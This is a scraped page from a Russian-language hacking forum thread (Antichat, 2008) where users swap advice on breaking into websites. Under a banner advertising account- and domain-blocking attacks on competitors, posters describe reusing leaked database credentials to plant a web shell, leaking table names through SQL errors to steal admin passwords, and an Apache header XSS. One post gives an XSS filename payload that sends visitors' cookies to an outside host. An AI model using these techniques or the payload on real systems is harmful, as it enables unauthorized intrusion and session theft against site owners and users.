УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 188 из 1393

188

Опции темы

Поиск в этой теме

Опции просмотра

#1871

02.05.2008, 21:12

xcedz

Познавший АНТИЧАТ

Регистрация: 14.01.2008

Сообщений: 1,165

Провел на форуме:
7229141

Репутация: 3099

Цитата:

Сообщение от Dronix

оО пездец полюбому черная магия, юзай читы

ты не понимаешь ничего.
предупреждения не воздействуют.

#1872

03.05.2008, 02:54

n0ne

Постоянный

Регистрация: 01.01.2007

Сообщений: 796

Провел на форуме:
2693408

Репутация: 861

Vid0k, поищи конфиги, мож там форум какой стоит или гест бук.

#1873

03.05.2008, 04:33

Vid0k

Постоянный

Регистрация: 24.12.2007

Сообщений: 574

Провел на форуме:
3186852

Репутация: 316

Отправить сообщение для Vid0k с помощью ICQ

Цитата:

Vid0k, поищи конфиги, мож там форум какой стоит или гест бук.

уже нашел конфиги для db логин и пасс подошли к phpmyadmin
права там урезаны пытался залить шелл через вывод таблицы в файл не дали)
в админке сайта нету даже где залить файл попробую
отредактировать шабон index может пропишу простейший шел а там уже посмотрю

#1874

03.05.2008, 14:25

samarin

Участник форума

Регистрация: 24.02.2008

Сообщений: 136

Провел на форуме:
295283

Репутация: 69

Отправить сообщение для samarin с помощью ICQ

Подскажите, что можно сделать в случае если, база данных 4.1.22-standard, установлен форум, но стандартный префикс в таблицах по идее изменен. Каким образом тогда можно узнать названия этого самого префикса, чтобы получить пароль админа?
----------------------------------
брут не предлогать-помоему это не реально

#1875

03.05.2008, 14:32

~~Лигендо Онтечада~~

Banned

Регистрация: 28.04.2008

Сообщений: 9

Провел на форуме:
25082

Репутация: 3

Вызови какую-нить ошибку mysql, чтоб она выплюнула название таблицы

Unfiltered Header Injection in Apache

#1876

05.05.2008, 10:18

vampir3a

Новичок

Регистрация: 25.11.2007

Сообщений: 9

Провел на форуме:
107030

Репутация: 1

Unfiltered Header Injection in Apache

Всем привет , сканернул сайт и нашёл крит уязвимость

Unfiltered Header Injection in Apache
This version of Apache is vulnerable to HTML injection (including malicious Javascript code) through "Expect" header. Until not it was not classed as security vulnerability as an attacker has no way to influence the Expect header a victim will send to a target site. However, according to Amit Klein's paper: "Forging HTTP request headers with Flash" there is a working cross site scripting (XSS) attack against Apache 1.3.34, 2.0.57 and 2.2.1 (as long as the client browser is IE or Firefox, and it supports Flash 6/7+).

Нашёл описание тут http://www.securityfocus.com/archive/1/433280
но так и не понял как ей пользоватся так же скрипт показывает <script>alert(39582,41865125)</script>

: ( подскажите пожалуйста что и как ... ?

Последний раз редактировалось vampir3a; 05.05.2008 в 10:24..

#1877

05.05.2008, 16:51

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

Отправить сообщение для Велемир с помощью ICQ

Всё прально, вместо цифр ставь текст : alert(/gagaga/) или alert(135)

Про XSS тут дофига статей, пофтыкай побольше.Если те нужен перевод, пиши на 292-514-125 : )

#1878

05.05.2008, 17:05

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

Ой мля,ступил ппц.Это атака через хттр заголовок Expect.Для этого надо создать объект и послать,лично не пробывал:Р.Прост этот торч надеется на то, что через ие и файрфокс так сделать нельзя(и правильно делает),но через объекты мона.

#1879

05.05.2008, 17:42

Jokester

Members of Antichat - Level 5

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

Цитата:

Сообщение от Велемир

Послушай, юноша, за каким хреном писать такой бред?
vampir3a
Вот немного об уязвимости на русском, но не особо обольщайся, сканер нашёл это не значит ,что получится использовать
_http://www.securitylab.ru/analytics/271169.php

#1880

05.05.2008, 19:48

+r0ot?r+

Новичок

Регистрация: 28.04.2008

Сообщений: 5

Провел на форуме:
116708

Репутация: 6

1.Есть форум, Powered by SMF 1.1.x,как узнать х?
2.Надеясь на удачу(что версия <=1.1.4), пробую приаттачить файл со следующим названием:

Код:

abc<img src= .width=1 height=1 onerror=javascriptnew&#32Image().src='http&#47&#47s.netsec.ru&#47arm.gif'+document.cookie>.txt

Но выдаётся ошибка:

Код:

default.htm.
Вы не можете отправить этот файл. Доступны только следующие типы файлов doc,gif,jpg,mpg,pdf,png,txt,zip.

Страница 188 из 1393

188

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход